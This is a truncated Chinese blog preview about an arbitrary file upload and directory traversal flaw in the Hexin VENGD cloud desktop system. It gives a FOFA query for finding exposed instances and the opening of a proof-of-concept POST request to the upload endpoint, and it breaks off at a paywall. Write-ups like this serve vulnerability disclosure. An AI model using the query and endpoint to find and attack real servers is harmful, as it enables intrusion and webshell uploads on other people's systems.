超级会员免费看
本文详细介绍了和信创天云桌面系统存在的任意文件上传和目录遍历漏洞。这些漏洞可能导致攻击者获取服务器敏感信息。通过fofa查询工具定位到目标系统,然后使用POC上传测试文件并利用目录遍历漏洞来查找和访问上传的文件。
一、 阅读须知
一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。
郑重声明:本文所提供的工具与思路仅用于学习与研究,禁止用于非法目的!
二、漏洞概述
和信创天专注虚拟化云计算领域,为首家集VOI/VDI/IDV于一体的云桌面厂家,助力教育、医疗、政企、军工、电力、金融等行业客户实现千台终端统一管理,确保数据安全与业务连续性。
和信下一代云桌面基于VDI/VOI/IDV三种技术架构优势,对于用户应用场景有着普遍的适用性,前后端混合计算保证在调度服务器后端资源的同时,也能充分利用前端计算资源,高性能的电脑和低功耗的瘦终端均能流畅地运行各种操作系统与应用软件,能够轻松实现千点以上大规模终端的集中管理。
该系统存在任意文件上传和目录遍历漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
三、漏洞复现
fofa:title=“和信下一代云桌面VENGD”
1.执行如下语句借助poc上传2023hello.php文件,内容为hello VeSYSTEM hello VeSYSTEM。
POST /Upload/upload_file.php?l=1 HTTP/1.1
Host: {
{Hostname}}
Use
订阅专栏 解锁全文
463
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
